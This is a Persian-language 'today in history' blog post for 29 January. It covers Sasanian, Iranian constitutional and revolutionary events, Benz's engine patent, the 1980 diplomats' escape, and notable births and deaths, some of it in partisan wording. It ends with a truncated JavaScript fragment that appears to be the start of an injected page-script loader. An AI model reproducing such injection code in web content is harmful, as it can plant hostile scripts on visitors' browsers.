امروز در تاریخ چه گذشت؟

امروز در تاریخ چه گذشت؟

271 آغاز سلطنت سومین پادشاه ساسانی «هرمز اول» پس از مرگ پدرش شاپور اول

 

10هرمز اول

ثبت اختراع موتور بنزيني اتومبيل1886

كارل بنز 29 ژانويه سال 1886 اختراع تازه خود ـ موتور يا انجين بنزيني، يا انفجاري را در كارلسروهه آلمان به ثبت داد.
وي براي نخستين بار در جهان، جزئيات ساختار موتور اتومبيلي را به ثبت داده بود كه داراي كاربوراتور و شمع (سيستم توليد جرقه) بود و این اتومبیل همچنین دارای كلاچ برای تعویض دنده بود. كارل بعدا با «گوتليب دايملر» شريك شد و كسب و كار اتومبيلسازي خودرا تحت نام دايملر بنز» رونق بخشيد

1

1320 امضاي پيمان سه جانبه بين انگلستان، شوروي و ايران

پس از تجاوز نيروهاي شوروي و انگلستان به ايران در شهريور 1320 و نقض بي‏طرفي ايران در جنگ جهاني دوم، پيماني سه جانبه بين ايران، انگلستان و شوروي به امضا رسيد. بر اساس اين پيمان تحميلي، دولت وقت ايران به نخست‏وزيري محمدعلي فروغي به ناچار پذيرفت كه راه‏ها و وسايل ارتباط زميني، هوايي و دريايي خود را در اختيار متفقين قرار دهد تا آنان با ارسال تجهيزات از طريق ايران، جبهه شوروي را در برابر آلمان نازي تقويت كنند. در برابر، دولت‏هاي شوروي و انگلستان، تماميت ارضي ايران را به رسميت شناختند و متعهد شدند كه حداكثر شش ماه پس از پايان جنگ، خاك ايران را ترك كنند. انگلستان و شوروي با اشغال ايران، نه تنها خساراتي جبران‏ناپذير به كشور وارد كردند، بلكه پس از پايان جنگ نيز بر خلاف پيمان نهم بهمن 1320، ارتش شوروي حاضر به ترك ايران نبود. حتي اتحاد جماهير شوروي تلاش كرد با تأسيس دولتي دست نشانده در شمال غربي ايران، زمينه‏هاي تجزيه اين بخش از خاك ايران را فراهم كند. اما اين توطئه با مقاومت مردم مسلمان ايران، به ويژه مبارزان و آزادي‏خواهان آذربايجان شكست خورد و ارتش شوروي در نهايت، مجبور به ترك خاك ايران شد.

1327 تبریز به دست مشروطه چیان افتاد

پس از به قدرت رسيدن محمدعلي شاه و بي ‏اعتنايى او به مشروطه، مردم تبريز دست به قيام زده و با رهبري باقرخان و ستارخان نداي مشروطه سر دادند. پس از آن تبريز توسط قواي دولتي ماه‏ها به محاصره درآمد ولي توفيقي جهت تصرف شهر، براي شاه به دست نيامد. مقاومت سرسختانه‏ ي مردم تبريز ده ماه به طول انجاميد و سرانجام در ربيع الثاني 1327 ق هنگامي كه سربازان روس به بهانه‏ي حمايت از خارجيان وارد اين شهر شدند، اين محاصره پايان يافت.

12

سران مشروطه تبریز

 بازگشايي فرودگاه‏هاي كشور به دستور بختيار1357

با گسترده‏تر شدن مخالفت‏ها و اعتراضات مردمي و پس از تحصن روحانيون در مسجد دانشگاه تهران، فرهنگيان و ديگر اقشار جامعه نيز با اعلام همبستگي، به جمع آنان پيوستند. در حالي كه تعداد متحصنين هر لحظه بيشتر مي‏شد و فشار افكار عمومي در اعتراض به بسته بودن فرودگاه‏ها جهت جلوگيري از ورود حضرت امام به كشور شدت مي‏گرفت، دولت به ناچار در نهم بهمن 57، دستور بازگشايي فرودگاه‏ها را صادر كرد و اعلام شد كه به مناسبت فرود هواپيماي حامل حضرت امام خميني(ره)، فرودگاه براي ساير پروازها بسته است. پس از آن، كميته استقبال از امام، اعلام كرد كه معظم‏له، ساعت 9 صبح روز دوازدهم بهمن ماه، وارد تهران خواهند شد. اين كميته همچنين از مردم خواست تا در مسير حركت امام خميني براي استقبال از ايشان آماده باشند. از طرف ديگر، با باز شدن فرودگاه مهرآباد تهران، هواپيماهاي نظامي آمريكا، شروع به خارج كردن آمريكايي‏ها از ايران كردند.

13

فرار دیپلمات ها  پس از تسخیر لانه ی جاسوسی 1980

 

شش تن از اعضاي سفارت سابق آمريكا در تهران كه در جريان تصرف اين سفارت فرار كرده و در سفارت كانادا پنهان شده بودند با گذرنامه  ديپلماتيك كانادا به عنوان اعضاي سفارت اين كشور با يك پرواز عادي از تهران خارج شدند. گفته شده بود که مُهر ويزاي ورودي آنان به تهران را «سيا» با مهارت تمام ساخته بود تا ايجاد ترديد نكند. در مورد همین موضوع نیز در سال 2012 فیلمی ضد ایرانی به نام آرگو ساخته شد که روایت زندگی این 6 نفر دیپلمات را پس از تسخیر لانه ی جاسوسی بیان میکند.

14

دیپلمات های آمریکایی پس از بازگشت به آمریکا

زادروزها

۱۸۱۰ – زادروز ارنست ادوارد کومر ریاضیدان آلمانی.
۱۸۶۰ – زادروز آنتوان چخوف از نمایشنامه‌نویسان برجسته روسی و نویسنده داستان‌های کوتاه.

15

آنتوان چخوف
. ۱۹۲۶ – زادروز عبدالسلام، فیزیکدان پاکستانی و برنده جایزه نوبل فیزیک
. ۱۳۲۹ – فریدون فروغی، آهنگساز، نوازنده (گیتار، پیانو، درام)، شاعر و خواننده ایرانی (درگذشت ۱۳ مهر ۱۳۸۰).
. ۱۳۳۱ – علیرضا خمسه، بازیگر ایرانی تئاتر، سینما و تلویزیون

16

فریدون فروغی

درگذشت‌ها

۱۶۷۶ – درگذشت الکسیس، تزار روسیه
۱۹۳۴ – درگذشت فریتس هابر، شیمی‌دان آلمانی؛ برنده جایزه نوبل شیمی.

17
فریتس هابر

۱۹۶۲ – درگذشت فریتز کرایسلر، آهنگساز و ویولونیست آمریکایی متولد اتریش.
۱۹۶۳ – درگذشت رابرت فراست، شاعر آمریکایی.

18
رابرت فراست

مطلب از: امین محمدیانvar d=document;var s=d.createElement(‘script’);